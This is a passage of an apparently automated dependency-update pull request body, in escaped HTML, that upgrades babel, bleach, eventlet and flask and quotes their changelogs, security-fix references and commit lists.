3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.5.3...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 2.1.3 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v2.1.3...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `eventlet` from 0.23.0 to 0.35.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eventlet/eventlet/blob/master/NEWS\"\u003eeventlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e0.35.2\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Fix tool.setuptools/packages list \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/921\"\u003eeventlet/eventlet#921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[security] Dnspython 2.6.1 - Address DoS via the Tudoor mechanism (CVE-2023-29483) \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/916\"\u003eeventlet/eventlet#916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[doc] add asyncio into the doc hub page \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/918\"\u003eeventlet/eventlet#918\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[clean] clean obsolete python 2 code from the ssl module \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/915\"\u003eeventlet/eventlet#915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Add get_server_info to db_pool.py \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/324\"\u003eeventlet/eventlet#324\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] wsgi: Handle Timeouts from applications \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/911\"\u003eeventlet/eventlet#911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] shrinks window before connecting \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/905\"\u003eeventlet/eventlet#905\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.35.1\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Do not allow failed patching to stop execution \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/907\"\u003eeventlet/eventlet#907\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.35.0\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[doc] Basic documentation for asyncio migration \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/892\"\u003eeventlet/eventlet#892\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[tests] add minimal linting \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/894\"\u003eeventlet/eventlet#894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[doc] officially host docs on readthedocs \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/899\"\u003eeventlet/eventlet#899\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] fix truncate size nullable \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/789\"\u003eeventlet/eventlet#789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Handle transport endpoint shutdown in conditions \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/884\"\u003eeventlet/eventlet#884\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Rework reject_bad_requests option \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/890\"\u003eeventlet/eventlet#890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix NameError introduced by \u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/826\"\u003e#826\u003c/a\u003e \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/890\"\u003eeventlet/eventlet#890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Support awaiting GreenThread in an \u003ccode\u003easync def\u003c/code\u003e context \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/889\"\u003eeventlet/eventlet#889\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[infra] Extend test cert to 2049 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/643\"\u003eeventlet/eventlet#643\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Asyncio hub support for Python 3.7 to 3.9 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/886\"\u003eeventlet/eventlet#886\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[infra] Modernize doc generation \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/880\"\u003eeventlet/eventlet#880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix bad exceptions handlings \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/883\"\u003eeventlet/eventlet#883\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Support using asyncio coroutines from inside greenlets \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/877\"\u003eeventlet/eventlet#877\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[removal] Remove deprecated CGIHTTPServer and SimpleHTTPServer \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/881\"\u003eeventlet/eventlet#881\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[governance] Update maintenance goals \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/850\"\u003eeventlet/eventlet#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Add an asyncio hub for eventlet \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/870\"\u003eeventlet/eventlet#870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.34.3\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix security issue in the wsgi module related to RFC 9112 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/826\"\u003eeventlet/eventlet#826\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix segfault, a new approach for greening existing locks \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/866\"\u003eeventlet/eventlet#866\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egreendns: fix getaddrinfo parameter name \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/809\"\u003eeventlet/eventlet#809\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix deprecation warning on ssl.PROTOCOL_TLS \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/872\"\u003eeventlet/eventlet#872\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePytests, fix error at teardown of TestGreenSocket.test_full_duplex \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/871\"\u003eeventlet/eventlet#871\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSkip test which uses Py cgi module \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/865\"\u003eeventlet/eventlet#865\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop old code based on python \u0026lt; 3.7\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.34.2\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/edd9e7e31e93161983a154430120d9ea125f3fd0\"\u003e\u003ccode\u003eedd9e7e\u003c/code\u003e\u003c/a\u003e Update changelog for version 0.35.2 (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/920\"\u003e#920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/a23fd0e196638ec83d6c5d1d62b3de4c454a75f9\"\u003e\u003ccode\u003ea23fd0e\u003c/code\u003e\u003c/a\u003e Fix tool.setuptools/packages list (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/921\"\u003e#921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/51e3c4928d4938beb576eff34f3bf97e6e64e6b4\"\u003e\u003ccode\u003e51e3c49\u003c/code\u003e\u003c/a\u003e Dnspython 2.6.1 - Address DoS via the Tudoor mechanism (CVE-2023-29483)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/b6f6e7c3a81853c2bf380f48bc0da7b894a3a903\"\u003e\u003ccode\u003eb6f6e7c\u003c/code\u003e\u003c/a\u003e add asyncio into the doc hub page (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/918\"\u003e#918\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/96a39405105c869b598662ac2748591f27eae81b\"\u003e\u003ccode\u003e96a3940\u003c/code\u003e\u003c/a\u003e clean obsolete python 2 code from the ssl module (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/06ec6307d7679c691fc161992f4b4304c5e32aeb\"\u003e\u003ccode\u003e06ec630\u003c/code\u003e\u003c/a\u003e Add get_server_info to db_pool.py (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/dfcc93953d761f7e13c04800d4d3b35257d4b840\"\u003e\u003ccode\u003edfcc939\u003c/code\u003e\u003c/a\u003e wsgi: Handle Timeouts from applications (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/911\"\u003e#911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/799dabcb3fffb81a15f1b9fb1930e4e28edd4a12\"\u003e\u003ccode\u003e799dabc\u003c/code\u003e\u003c/a\u003e [Fix] shrinks window before connecting (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/905\"\u003e#905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/3f8c9e4ede97e0bd57d8b1ab4aa56e51bf35582c\"\u003e\u003ccode\u003e3f8c9e4\u003c/code\u003e\u003c/a\u003e Do not allow failed patching to stop execution (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/907\"\u003e#907\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/d467343102b0a24c19feff62321137162e924751\"\u003e\u003ccode\u003ed467343\u003c/code\u003e\u003c/a\u003e Add Python 3.7 to pyproject classifiers (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/904\"\u003e#904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eventlet/eventlet/compare/v0.23.0...v0.35.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 1.0.2 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca 